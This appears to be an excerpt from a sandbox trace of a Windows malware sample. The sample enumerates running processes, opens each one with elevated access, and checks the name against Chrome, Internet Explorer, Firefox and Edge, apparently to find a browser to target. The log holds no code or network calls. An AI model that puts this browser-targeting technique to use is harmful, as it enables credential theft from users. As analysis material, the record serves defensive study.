	[0226.537] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0226.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x5ec0
	[0226.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.538] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0226.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.538] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.538] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0226.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.538] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.539] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5ec4
	[0226.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.540] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.540] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.540] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.541] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.541] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5ec8
	[0226.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.542] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.542] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.543] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.543] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.543] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5ecc
	[0226.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.593] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.829] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.829] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.829] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5ed0
	[0226.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.831] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.831] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.831] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.832] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5ed4
	[0226.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.833] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.833] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.834] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.834] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.834] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5ed8
	[0226.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.835] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.836] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.836] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.836] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.837] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5edc
	[0226.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.838] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.838] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.838] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.839] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.839] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0226.839] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5ee0
	[0226.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.840] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0226.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.840] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.841] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0226.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.841] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.841] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5ee4
	[0226.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.842] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.843] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.843] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.843] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.844] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0226.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5ee8
	[0226.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.845] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.845] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.845] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.846] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.846] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0226.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5eec
	[0226.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.847] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0226.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.847] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.847] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0226.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.848] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.848] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5ef0
	[0226.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.849] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.849] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.850] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.850] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0226.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5ef4
	[0226.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.851] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0226.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.851] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.852] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0226.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.852] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.852] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0226.853] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5ef8
	[0226.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.853] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0226.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.854] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.854] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0226.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.854] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.855] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0226.855] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5efc
	[0226.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.856] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0226.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.856] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.856] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0226.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.856] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.857] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0226.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5f00
	[0226.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.858] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0226.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.858] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.858] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0226.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.859] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0226.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0226.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0226.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5f04
	[0226.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.863] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0226.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.863] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.864] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0226.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.865] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.865] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0226.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5f08
	[0226.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.866] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0226.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.866] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.867] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0226.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.867] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.867] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0226.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5f0c
	[0226.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.868] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0226.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.868] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.869] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0226.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.869] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0226.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5f10
	[0226.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.870] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0226.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.871] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.871] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0226.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.871] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0226.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5f14
	[0226.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.873] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0226.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.873] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.874] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0226.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.874] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0226.876] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5f18
	[0226.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.876] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0226.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.877] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.877] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0226.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.878] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0226.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5f1c
	[0226.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.879] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0226.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.880] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.880] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0226.881] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.881] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.882] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
